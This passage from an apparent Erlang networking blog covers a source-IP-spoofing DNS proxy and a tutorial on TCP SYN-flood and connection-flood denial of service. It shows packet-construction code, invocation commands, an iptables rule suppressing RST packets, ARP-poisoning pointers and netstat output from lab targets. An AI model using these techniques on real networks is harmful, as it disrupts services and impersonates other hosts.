<span class="Identifier">0:16</span>,
Data<span class="Statement">/</span><span class="Identifier">binary</span>,
<span class="Identifier">0:UDPpad</span><span class="Statement">>></span> <span class="Comment">% UDPpad may be 0 or 8 bits</span>
</pre><h1>A Spoofing DNS Proxy</h1><h2>What?</h2><a href="http://github.com/msantos/spood">spood</a> is a spoofing DNS proxy with a vaguely obscene name. spood works by accepting DNS queries on localhost and then spoofing the source IP address of the DNS request using the Linux <a href="http://swoolley.org/man.cgi/7/packet">PF_PACKET</a> interface. DNS replies are sniffed off the network and returned to localhost. <h2>Why?</h2>Maybe for using with <a href="http://blog.listincomprehension.com/2009/12/sods-care-and-feeding-of.html">IP over DNS tunnels</a>? <h2>How?</h2>spood works with <a href="http://github.com/msantos/procket">procket</a> and <a href="http://github.com/msantos/epcap">epcap</a>. <h2>This Will Probably Be the First Page Returned For Searches For "Erlang Promiscuity"</h2>While spood can run by spoofing its own IP address, it's more fun running it on a hubbed or public wireless network. To allow spood to sniff the network, I added support for <a href="http://www.manpagez.com/man/2/setsockopt/">setsockopt()</a> to procket as an additional NIF. Promiscuous mode, under Linux, can be activated/deactivated globally by using an ioctl() or per application by using setsockopt(). To enable promiscuous mode, the application needs to call: <pre class="Code">setsockopt(socket, SOL_PACKET, PACKET_ADD_MEMBERSHIP, (<span class="Type">void</span> *)&mreq, <span class="Statement">sizeof</span>(mreq))
</pre>Though obtaining a PF_PACKET socket requires root privileges, performing the setsockopt() call on the socket does not. mreq is a <em>struct packet_mreq</em>: <pre class="Code"><span class="Type">struct</span> packet_mreq {
<span class="Type">int</span> mr_ifindex; <span class="Comment">/*</span><span class="Comment"> interface index </span><span class="Comment">*/</span>
<span class="Type">unsigned</span> <span class="Type">short</span> mr_type; <span class="Comment">/*</span><span class="Comment"> action </span><span class="Comment">*/</span>
<span class="Type">unsigned</span> <span class="Type">short</span> mr_alen; <span class="Comment">/*</span><span class="Comment"> address length </span><span class="Comment">*/</span>
<span class="Type">unsigned</span> <span class="Type">char</span> mr_address[<span class="Constant">8</span>]; <span class="Comment">/*</span><span class="Comment"> physical layer address </span><span class="Comment">*/</span>
};
</pre><ul><li><em>mr_ifindex</em> is the interface index returned by doing an <a href="http://blog.listincomprehension.com/2010/06/fun-with-raw-sockets-in-erlang-sending.html">ioctl() in host endian format</a><br />
<li><em>mr_type</em> is set to PACKET_MR_PROMISC in host endian format<br />
<li>the reminder of the struct is zero'ed<br />
</ul>The Erlang version looks like: <pre class="Code"><span class="Type">-define</span>(SOL_PACKET, <span class="Constant">263</span>)<span class="Special">.</span>
<span class="Type">-define</span>(PACKET_ADD_MEMBERSHIP, <span class="Constant">1</span>)<span class="Special">.</span>
<span class="Type">-define</span>(PACKET_DROP_MEMBERSHIP, <span class="Constant">2</span>)<span class="Special">.</span>
<span class="Type">-define</span>(PACKET_MR_PROMISC, <span class="Constant">1</span>)<span class="Special">.</span>
promiscuous(Socket, Ifindex) <span class="Statement">-></span>
<span class="Identifier">procket:setsockopt</span>(Socket, ?SOL_PACKET, ?PACKET_ADD_MEMBERSHIP, <span class="Statement"><<</span>
<span class="Identifier">Ifindex:32</span><span class="Statement">/</span>native, <span class="Comment">% mr_ifindex: interface index</span>
?<span class="Identifier">PACKET_MR_PROMISC:16</span><span class="Statement">/</span>native, <span class="Comment">% mr_type: action</span>
<span class="Identifier">0:16</span>, <span class="Comment">% mr_alen: address length</span>
<span class="Identifier">0:64</span> <span class="Comment">% mr_address[8]: physical layer address</span>
<span class="Statement">>></span>)<span class="Special">.</span>
</pre><h2>Sniffing Packets</h2><a href="http://github.com/msantos/spood/raw/master/src/snuff.erl">Sniffing packets</a> involves running procket:recvfrom/2 in a loop. Erlang's pattern matching makes filtering the packets simple. One trick is retrieving the default nameservers in Erlang. <pre class="Code">{ok, PL} <span class="Statement">=</span> <span class="Identifier">inet_parse:resolv</span>(
<span class="Identifier">proplists:get_value</span>(resolv_conf, <span class="Identifier">inet_db:get_rc</span>(), <span class="Constant">"/etc/resolv.conf"</span>)),
NS <span class="Statement">=</span> <span class="Identifier">proplists:get_value</span>(nameserver, PL)<span class="Special">.</span>
</pre><em>inet_db:get_rc()</em> will return the path to the system resolv.conf file. <em>inet_parse</em> has an undocumented function to parse resolv.conf and return the attributes as list of key/value pairs. <h2>Spoofing Packets</h2><a href="http://github.com/msantos/spood/raw/master/src/spoof.erl">Spoofing packets</a> is done by constructing a packet consisting of the Ethernet, IP and UDP header and payload. <pre class="Code">dns_query(SourcePort, Data, #state{
shost <span class="Statement">=</span> {SM1,SM2,SM3,SM4,SM5,SM6},
dhost <span class="Statement">=</span> {DM1,DM2,DM3,DM4,DM5,DM6},
saddr <span class="Statement">=</span> {SA1,SA2,SA3,SA4},
daddr <span class="Statement">=</span> {DA1,DA2,DA3,DA4}
}) <span class="Statement">-></span>
Id <span class="Statement">=</span> <span class="Constant">1</span>,
TTL <span class="Statement">=</span> <span class="Constant">64</span>,
UDPlen <span class="Statement">=</span> <span class="Constant">8</span> <span class="Statement">+</span> byte_size(Data),
IPlen <span class="Statement">=</span> <span class="Constant">20</span> <span class="Statement">+</span> UDPlen,
IPsum <span class="Statement">=</span> <span class="Identifier">epcap_net:makesum</span>(
<span class="Statement"><<</span>
<span class="Comment">% IPv4 header</span>
<span class="Identifier">4:4</span>, <span class="Identifier">5:4</span>, <span class="Identifier">0:8</span>, <span class="Identifier">IPlen:16</span>,
<span class="Identifier">Id:16</span>, <span class="Identifier">0:1</span>, <span class="Identifier">1:1</span>, <span class="Identifier">0:1</span>,
<span class="Identifier">0:13</span>, <span class="Identifier">TTL:8</span>, <span class="Identifier">17:8</span>, <span class="Identifier">0:16</span>,
<span class="Identifier">SA1:8</span>, <span class="Identifier">SA2:8</span>, <span class="Identifier">SA3:8</span>, <span class="Identifier">SA4:8</span>,
<span class="Identifier">DA1:8</span>, <span class="Identifier">DA2:8</span>, <span class="Identifier">DA3:8</span>, <span class="Identifier">DA4:8</span>
<span class="Statement">>></span>
),
UDPpad <span class="Statement">=</span> <span class="Statement">case</span> UDPlen <span class="Statement">rem</span> <span class="Constant">2</span> <span class="Statement">of</span>
<span class="Constant">0</span> <span class="Statement">-></span> <span class="Constant">0</span>;
<span class="Constant">1</span> <span class="Statement">-></span> <span class="Constant">8</span>
<span class="Statement">end</span>,
UDPsum <span class="Statement">=</span> <span class="Identifier">epcap_net:makesum</span>(
<span class="Statement"><<</span>
<span class="Identifier">SA1:8</span>,<span class="Identifier">SA2:8</span>,<span class="Identifier">SA3:8</span>,<span class="Identifier">SA4:8</span>,
<span class="Identifier">DA1:8</span>,<span class="Identifier">DA2:8</span>,<span class="Identifier">DA3:8</span>,<span class="Identifier">DA4:8</span>,
<span class="Identifier">0:8</span>,
<span class="Identifier">17:8</span>,
<span class="Identifier">UDPlen:16</span>,
<span class="Identifier">SourcePort:16</span>,
<span class="Identifier">53:16</span>,
<span class="Identifier">UDPlen:16</span>,
<span class="Identifier">0:16</span>,
Data<span class="Statement">/</span><span class="Identifier">binary</span>,
<span class="Identifier">0:UDPpad</span>
<span class="Statement">>></span>),
<span class="Statement"><<</span>
<span class="Comment">% Ethernet header</span>
<span class="Identifier">DM1:8</span>,<span class="Identifier">DM2:8</span>,<span class="Identifier">DM3:8</span>,<span class="Identifier">DM4:8</span>,<span class="Identifier">DM5:8</span>,<span class="Identifier">DM6:8</span>,
<span class="Identifier">SM1:8</span>,<span class="Identifier">SM2:8</span>,<span class="Identifier">SM3:8</span>,<span class="Identifier">SM4:8</span>,<span class="Identifier">SM5:8</span>,<span class="Identifier">SM6:8</span>,
<span class="Constant">16</span>#<span class="Constant">08</span>, <span class="Constant">16</span>#<span class="Constant">00</span>,
<span class="Comment">% IPv4 header</span>
<span class="Identifier">4:4</span>, <span class="Identifier">5:4</span>, <span class="Identifier">0:8</span>, <span class="Identifier">IPlen:16</span>,
<span class="Identifier">Id:16</span>, <span class="Identifier">0:1</span>, <span class="Identifier">1:1</span>, <span class="Identifier">0:1</span>,
<span class="Identifier">0:13</span>, <span class="Identifier">TTL:8</span>, <span class="Identifier">17:8</span>, <span class="Identifier">IPsum:16</span>,
<span class="Identifier">SA1:8</span>, <span class="Identifier">SA2:8</span>, <span class="Identifier">SA3:8</span>, <span class="Identifier">SA4:8</span>,
<span class="Identifier">DA1:8</span>, <span class="Identifier">DA2:8</span>, <span class="Identifier">DA3:8</span>, <span class="Identifier">DA4:8</span>,
<span class="Comment">% UDP header</span>
<span class="Identifier">SourcePort:16</span>,
<span class="Identifier">53:16</span>,
<span class="Identifier">UDPlen:16</span>,
<span class="Identifier">UDPsum:16</span>,
Data<span class="Statement">/</span><span class="Identifier">binary</span>
<span class="Statement">>></span><span class="Special">.</span>
</pre><h1>Running spood</h1>Setup isn't all automatic yet (but see the README, maybe this has changed). After everything is compiled, find the MAC and IP address of your client and name server. Then run: <pre class="Code">erl <span class="Statement">-</span>pa ebin deps<span class="Statement">/*/</span>ebin
<span class="Constant">1</span><span class="Statement">></span> <span class="Identifier">spood:start</span>(<span class="Constant">"eth0"</span>,
{{<span class="Constant">16</span>#<span class="Constant">00</span>,<span class="Constant">16</span>#<span class="Constant">aa</span>,<span class="Constant">16</span>#<span class="Constant">bb</span>,<span class="Constant">16</span>#<span class="Constant">cc</span>,<span class="Constant">16</span>#<span class="Constant">dd</span>,<span class="Constant">16</span>#<span class="Constant">ee</span>}, {<span class="Identifier">list</span>, [{<span class="Constant">192</span>,<span class="Constant">168</span>,<span class="Constant">100</span>,<span class="Constant">100</span>}, {<span class="Constant">192</span>,<span class="Constant">168</span>,<span class="Constant">100</span>,<span class="Constant">101</span>}]}},
{{<span class="Constant">16</span>#<span class="Constant">00</span>,<span class="Constant">16</span>#<span class="Constant">11</span>,<span class="Constant">16</span>#<span class="Constant">22</span>,<span class="Constant">16</span>#<span class="Constant">33</span>,<span class="Constant">16</span>#<span class="Constant">44</span>,<span class="Constant">16</span>#<span class="Constant">55</span>}, {<span class="Constant">192</span>,<span class="Constant">168</span>,<span class="Constant">100</span>,<span class="Constant">1</span>}})<span class="Special">.</span>
</pre>Where: <ul><li>The first argument is your interface device name<br />
<li>The second argument is a 2-tuple composed of your source MAC address and a representation of what should be used for your client IP address. Unless you're ARP spoofing or have published the ARP entries yourself, the IP's should be of clients on the network.<br />
<br />
The second argument can be a tuple or a string representing an IP or a tuple consisting of the keyword "list" followed a list of IP addresses. The source IP for each query will be randomly chosen from the list.<br />
<br />
<li>The third argument is the name server MAC and IP address<br />
</ul>Then test it: <pre class="Code">$ nslookup
<span class="Statement">></span> server <span class="Constant">127</span>.<span class="Constant">0</span>.<span class="Constant">0</span>.<span class="Constant">1</span>
Default server: <span class="Constant">127</span>.<span class="Constant">0</span>.<span class="Constant">0</span>.<span class="Constant">1</span>
Address: <span class="Constant">127</span>.<span class="Constant">0</span>.<span class="Constant">0</span>.<span class="Constant">1#53</span>
<span class="Statement">></span> www.google.com
Server: <span class="Constant">127</span>.<span class="Constant">0</span>.<span class="Constant">0</span>.<span class="Constant">1</span>
Address: <span class="Constant">127</span>.<span class="Constant">0</span>.<span class="Constant">0</span>.<span class="Constant">1#53</span>
Non-authoritative answer:
www.google.com canonical name <span class="Statement">=</span> www.l.google.com.
Name: www.l.google.com
Address: <span class="Constant">173</span>.<span class="Constant">194</span>.<span class="Constant">33</span>.<span class="Constant">104</span>
</pre>If you happen to be running the sods client, you can use the DNS proxy by using the "-r" option: <pre class="Code">sdt <span class="Special">-r</span> <span class="Constant">127</span>.<span class="Constant">0</span>.<span class="Constant">0</span>.<span class="Constant">1</span> sshdns.s.example.com
</pre><b>Update:</b> Well, I've tested <em>spood</em> in the wild now and made a few changes. By default, spood will discover the IP addresses on your network and add them to the list of source addresses to spoof. spood now takes a <a href="http://www.erlang.org/doc/man/proplists.html">proplist</a> as an argument. However, if no argument is passed, spood will try to figure out your network by: <ul><li>guessing which interface device to use<br />
<li>finding the MAC and IP address assigned to the device<br />
<li>looking up the MAC address of the name server in the ARP cache<br />
</ul>The arguments to spood:start/1 is a proplist consisting of: <ul><li>{dev, string() | undefined}<br />
<li>{srcmac, tuple()}<br />
<li>{dstmac, tuple()}<br />
<li>{saddr, tuple() | string() | discover | {discover, list()} | {list, list()}}<br />
<li>{nameserver, tuple() | undefined}<br />
</ul><br />
Or call spood:start() to use the defaults.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8577871288924093307.post-48703757923684720202010-06-20T16:12:00.018-04:002010-09-04T18:16:13.682-04:00Fun with Raw Sockets in Erlang: Abusing TCP<h1>TCP Packet Structure</h1>A <a href="http://www.faqs.org/rfcs/rfc793.html">TCP header</a> is represented by:<br />
<div><ul class="Message"><li class="Message">Source Port:16</li>
<li class="Message">Destination Port:48</li>
<li class="Message">Sequence Number:32</li>
<li class="Message">Acknowledgement Number:32</li>
<li class="Message">Data Offset:4</li>
<li class="Message">Reserved:4</li>
<li class="Message">Congestion Window Reduced (CWR):1</li>
<li class="Message">ECN-Echo (ECE):1</li>
<li class="Message">Urgent (URG):1</li>
<li class="Message">Acknowledgement (ACK):1</li>
<li class="Message">Push (PSH):1</li>
<li class="Message">Reset (RST):1</li>
<li class="Message">Synchronize (SYN):1</li>
<li class="Message">Finish (FIN):1</li>
<li class="Message">Window Size:16</li>
<li class="Message">TCP Pseudo-Header Checksum:16</li>
<li class="Message">Urgent Pointer:16</li>
<li class="Message">Options:0-320</li>
</ul></div><ul><li>The <em>Data offset</em> is the length of the TCP header and in 32-bit words, i.e., multiply the offset by 4 to get the number of bytes.<br />
<li>The CWR and ECE flags were added in <a href="http://www.faqs.org/rfcs/rfc3168.html">RFC 3168</a>.<br />
<li>The TCP checksum is calculated by forming a pseudo-header from attributes of the IP header prepended to the TCP header and payload. When performing the checksum, the TCP checksum field is set to 0.<br />
<li>An offset greater than 5 (20 bytes for the mandatory header elements) indicates the presence of <em>(offset-5)*4</em> bytes of <em>TCP Options</em> in the header. Since the offset field is 4 bits, the maximum value of the offset field is 15, allowing for up to 40 bytes of options. Options are not used in the examples below.<br />
</ul>The equivalent TCP header in Erlang is: <pre class="Code"><span class="Statement"><<</span><span class="Identifier">SPort</span>:<span class="Constant">16</span>, <span class="Identifier">DPort</span>:<span class="Constant">16</span>,
<span class="Identifier">SeqNo</span>:<span class="Constant">32</span>,
<span class="Identifier">AckNo</span>:<span class="Constant">32</span>,
<span class="Identifier">Off</span>:<span class="Constant">4</span>, <span class="Constant">0</span>:<span class="Constant">4</span>, <span class="Identifier">CWR</span>:<span class="Constant">1</span>, <span class="Identifier">ECE</span>:<span class="Constant">1</span>, <span class="Identifier">URG</span>:<span class="Constant">1</span>, <span class="Identifier">ACK</span>:<span class="Constant">1</span>,
<span class="Identifier">PSH</span>:<span class="Constant">1</span>, <span class="Identifier">RST</span>:<span class="Constant">1</span>, <span class="Identifier">SYN</span>:<span class="Constant">1</span>, <span class="Identifier">FIN</span>:<span class="Constant">1</span>, <span class="Identifier">Win</span>:<span class="Constant">16</span>,
<span class="Identifier">Sum</span>:<span class="Constant">16</span>, <span class="Identifier">Urp</span>:<span class="Constant">16</span><span class="Statement">>></span>
</pre>The pseudo-header can be illustrated as: <div><ul class="Message"><li class="Message">Source Address:32</li>
<li class="Message">Destination Address:32</li>
<li class="Message">Zero:8</li>
<li class="Message">Protocol:8</li>
<li class="Message">TCP Header Length:16</li>
<li class="Message">TCP Header and Payload:1</li>
<li class="Message">...</li>
<li class="Message">TCP Header and Payload:N</li>
</ul></div><ul><li>The <em>Source Address</em> from the IP header.<br />
<li>The <em>Destination Address</em> from the IP header.<br />
<li>The <em>Protocol</em> as specified by the IP header. For TCP, the value will be 6.<br />
<li>The <em>TCP Header Length</em> in bytes. The length of the IP pseudo-header is not included.<br />
<li>The <em>TCP Header and Payload</em> contains the full TCP packet.<br />
</ul>In Erlang, the IP pseudo-header is represented as: <pre class="Code"><span class="Statement"><<</span><span class="Identifier">SA1</span>:<span class="Constant">8</span>,<span class="Identifier">SA2</span>:<span class="Constant">8</span>,<span class="Identifier">SA3</span>:<span class="Constant">8</span>,<span class="Identifier">SA4</span>:<span class="Constant">8</span>, <span class="Comment">% bytes representing the IP source address</span>
<span class="Identifier">DA1</span>:<span class="Constant">8</span>,<span class="Identifier">DA2</span>:<span class="Constant">8</span>,<span class="Identifier">DA3</span>:<span class="Constant">8</span>,<span class="Identifier">DA4</span>:<span class="Constant">8</span>, <span class="Comment">% bytes representing the IP destination address</span>
<span class="Constant">0</span>:<span class="Constant">8</span>, <span class="Comment">% Zero</span>
<span class="Constant">6</span>:<span class="Constant">8</span>, <span class="Comment">% Protocol: TCP</span>
(<span class="Identifier">TCPoff</span> <span class="Statement">*</span> <span class="Constant">4</span>):<span class="Constant">16</span><span class="Statement">>></span> <span class="Comment">% TCP packet size in bytes</span>
</pre><h1>Exhausting Server Resources</h1>TCP is stateful, requiring the client and server to allocate resources to manage each phase of the connection. A TCP connection is established by synchronizing the sequence numbers of the client and server. <ul><li>The client sends a 20 byte TCP packet:<br />
<ul><li>the SYN bit is set to 1<br />
<li>a randomly chosen sequence number<br />
<li>the acknowledgment number set to 0<br />
<li>no payload<br />
</ul>The client goes into state "SYN_SENT".
<li>The server replies with:<br />
<ul><li>the SYN bit set to 1<br />
<li>the ACK bit set to 1<br />
<li>a randomly chosen sequence number<br />
<li>the acknowledgement number is set to the client's sequence number, incremented by 1<br />
<li>no payload<br />
</ul>The server goes into state "SYN_RECEIVED".
<li>The client replies with:<br />
<ul><li>the SYN bit set to 0<br />
<li>the ACK bit set to 1<br />
<li>the sequence number (the acknowledgement number returned by the server)<br />
<li>the acknowledgement number, the sequence number of the server incremented by the size in bytes of the payload<br />
<li>an optional payload<br />
</ul>The client goes into state "ESTABLISHED" </ul><br />
Each phase of the connection needs to be tracked by the operating system. For example, if the initial SYN packet sent by the client does not result in a response, the client will resend the SYN packet, typically up to 3 times, before returning a timeout error.<br />
<br />
On the server, if the SYN ACK is not ACK'ed by the client, the server must periodically attempt to re-send the SYN-ACK packet before freeing the resources allocated to this connection.<br />
<br />
The resources required for tracking these connections, although small, can be exhausted either through high demand or a denial of service attack using several simple, well known attacks.<br />
<ul><li>SYN flood: Sending a large number of requests to initiate a TCP connection will prevent the server from accepting connections from legitimate clients.<br />
<li>connection flood: Usually a client is limited in the number of connections it can open to a server; for example, by the number of available file descriptors. If the client can track the connections statelessly, a single client can overwhelm the server.<br />
</ul><h1>Preparation</h1><ul><li>We'll use <a href="http://github.com/msantos/procket">procket</a> to pass the raw sockets into Erlang. To see how the packets are sent, <a href="http://blog.listincomprehension.com/2010/06/fun-with-raw-sockets-in-erlang-sending.html">see this tutorial</a>.<br />
<br />
procket uses the PF_PACKET socket interface, so these examples are Linux specific. I ran them on an Ubuntu 8.04 system. The functions in this source file can be used to send the Erlang binaries.<br />
<script src="http://gist.github.com/446037.js?file=packet.erl"></script><br />
<br />
<li>I've tried to make the examples as self-contained as possible, but for parsing the packets and converting them into Erlang records, you'll need a copy of <a href="http://github.com/msantos/epcap/raw/master/src/epcap_net.erl">epcap_net.erl</a> and <a href="http://github.com/msantos/epcap/raw/master/include/epcap_net.hrl">epcap_net.hrl</a> from <a href="http://github.com/msantos/epcap">epcap</a>.<br />
<br />
<li>On a hubbed network, like public 802.11 networks, you should be able to assign any IP address and act on the replies. <br />
<br />
<li>If you are on a switched network or on an 802.11 network pretending to be switched (WEP/WPA security), you'll only be able to sniff replies to your assigned IP address. Or you can use ARP poisoning, <a href="http://ettercap.sourceforge.net/">ettercap</a> works well.<br />
</ul><h1>SYN Flood</h1>A SYN flood simply sends a large number of TCP packets with the SYN bit set to a target port. The source port, sequence number and (potentially) source IP address can be randomly assigned. However, the source IP address should be non-existent. Any client listening on that IP will RST the connection when the server SYN ACK's, causing the server to deallocate all resources associated with the embryonic session. <script src="http://gist.github.com/446042.js?file=syn.erl"></script> <em>syn</em> takes these arguments: <ul><li>Device name<br />
<li>Source 3-tuple<br />
<ul><li>Source MAC address<br />
<li>IP address <br />
<li>Source port, can be 0 to randomly choose a port<br />
</ul><li>Destination 3-tuple<br />
<ul><li>Destination MAC address<br />
<li>IP address <br />
<li>Source port, can be 0 to randomly choose a port<br />
</ul><li>Number of SYN packets to be sent<br />
</ul><pre class="Code"><span class="Constant">1</span><span class="Statement">></span> syn:flood(<span class="Constant">"ath0"</span>,
<span class="Special">{{</span><span class="Constant">16#00</span>,<span class="Constant">16#15</span>,<span class="Constant">16#af</span>,<span class="Constant">16#59</span>,<span class="Constant">16#08</span>,<span class="Constant">16#26</span><span class="Special">}</span>, <span class="Special">{</span><span class="Constant">192</span>,<span class="Constant">168</span>,<span class="Constant">213</span>,<span class="Constant">213</span><span class="Special">}</span>, <span class="Constant">0</span><span class="Special">}</span>,
<span class="Special">{{</span><span class="Constant">16#00</span>,<span class="Constant">16#16</span>,<span class="Constant">16#3E</span>,<span class="Constant">16#E9</span>,<span class="Constant">16#04</span>,<span class="Constant">16#06</span><span class="Special">}</span>, <span class="Special">{</span><span class="Constant">192</span>,<span class="Constant">168</span>,<span class="Constant">213</span>,<span class="Constant">7</span><span class="Special">}</span>, <span class="Constant">8080</span><span class="Special">}</span>, <span class="Constant">10</span>).
ok
</pre><pre class="Code">msantos@ecn:~$ netstat <span class="Special">-an</span> <span class="Statement">|</span>grep <span class="Constant">8080</span>
tcp <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span>.<span class="Constant">0</span>.<span class="Constant">0</span>.<span class="Constant">0</span>:<span class="Constant">8080</span> <span class="Constant">0</span>.<span class="Constant">0</span>.<span class="Constant">0</span>.<span class="Constant">0</span>:* LISTEN
tcp <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">7</span>:<span class="Constant">8080</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">213</span>:<span class="Constant">18868</span> SYN_RECV
tcp <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">7</span>:<span class="Constant">8080</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">213</span>:<span class="Constant">5705</span> SYN_RECV
tcp <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">7</span>:<span class="Constant">8080</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">213</span>:<span class="Constant">60884</span> SYN_RECV
tcp <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">7</span>:<span class="Constant">8080</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">213</span>:<span class="Constant">49723</span> SYN_RECV
tcp <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">7</span>:<span class="Constant">8080</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">213</span>:<span class="Constant">1362</span> SYN_RECV
tcp <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">7</span>:<span class="Constant">8080</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">213</span>:<span class="Constant">53146</span> SYN_RECV
tcp <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">7</span>:<span class="Constant">8080</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">213</span>:<span class="Constant">57667</span> SYN_RECV
tcp <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">7</span>:<span class="Constant">8080</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">213</span>:<span class="Constant">37629</span> SYN_RECV
tcp <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">7</span>:<span class="Constant">8080</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">213</span>:<span class="Constant">7937</span> SYN_RECV
tcp <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">7</span>:<span class="Constant">8080</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">213</span>:<span class="Constant">58975</span> SYN_RECV
</pre><h1>Connection Flood</h1>A connection flood works by sending a number of SYN packets to the destination port. The server will reply with a SYN-ACK. The client monitors the network for any replies from the destination port with the ACK bit set and sends an acknowledgement in response. For an example of this behaviour, see <a href="http://github.com/msantos/drench">drench</a>, a utility written in C using <a href="http://packetfactory.openwall.net/">libnet</a>. The Erlang version is simpler, smaller and much more elegant. <script src="http://gist.github.com/446056.js?file=ack.erl"></script> On a switched network, you won't be able to sniff the replies to spoofed IP addresses. To run a connection flood, you'll need to adjust your firewall to drop RST packets. Since I'm using Ubuntu, I used the simple firewall interface, ufw. <pre class="Code">$ ufw enable
$ iptables <span class="Special">-I</span> ufw-before-output <span class="Special">-p</span> tcp <span class="Special">--tcp-flags</span> RST RST <span class="Special">--destination-port</span> <span class="Constant">8080</span> <span class="Special">-j</span> DROP
</pre>Spawn a process to respond to ACK's. <em>ack</em> takes 2 arguments: <ul><li>Device name<br />
<li>Port<br />
</ul>For example, if you are listening on the <em>eth0</em> device for packets with a target port of 8080: <pre class="Code"><span class="Constant">1</span><span class="Statement">></span> <span class="Statement">spawn</span>(ack, start, <span class="Special">[</span><span class="Constant">"eth0"</span>, <span class="Constant">8080</span><span class="Special">]</span>).
<span class="Statement"><</span><span class="Constant">0.34</span>.<span class="Constant">0</span><span class="Statement">></span>
</pre>Then send out SYN packets: <pre class="Code"><span class="Constant">2</span><span class="Statement">></span> syn:flood(). <span class="Comment">% send out 10 SYN packets</span>
ok
</pre>Checking the target host shows a number of connections in the ESTABLISHED state: <pre class="Code">msantos@ecn:~$ netstat <span class="Special">-an</span> <span class="Statement">|</span>grep <span class="Constant">8080</span>
tcp <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">0</span>.<span class="Constant">0</span>.<span class="Constant">0</span>.<span class="Constant">0</span>:<span class="Constant">8080</span> <span class="Constant">0</span>.<span class="Constant">0</span>.<span class="Constant">0</span>.<span class="Constant">0</span>:* LISTEN
tcp <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">7</span>:<span class="Constant">8080</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">213</span>:<span class="Constant">50691</span> ESTABLISHED
tcp <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">7</span>:<span class="Constant">8080</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">213</span>:<span class="Constant">49955</span> ESTABLISHED
tcp <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">7</span>:<span class="Constant">8080</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">213</span>:<span class="Constant">12017</span> ESTABLISHED
tcp <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">7</span>:<span class="Constant">8080</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">213</span>:<span class="Constant">13662</span> ESTABLISHED
tcp <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">7</span>:<span class="Constant">8080</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">213</span>:<span class="Constant">35611</span> ESTABLISHED
tcp <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">7</span>:<span class="Constant">8080</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">213</span>:<span class="Constant">57062</span> ESTABLISHED
tcp <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">7</span>:<span class="Constant">8080</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">213</span>:<span class="Constant">11549</span> ESTABLISHED
tcp <span class="Constant">0</span> <span class="Constant">0</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">7</span>:<span class="Constant">8080</span> <span class="Constant">192</span>.<span class="Constant">168</span>.<span class="Constant">213</span>.<span class="Constant">213</span>:<span class="Constant">30963</span> ESTABLISHED
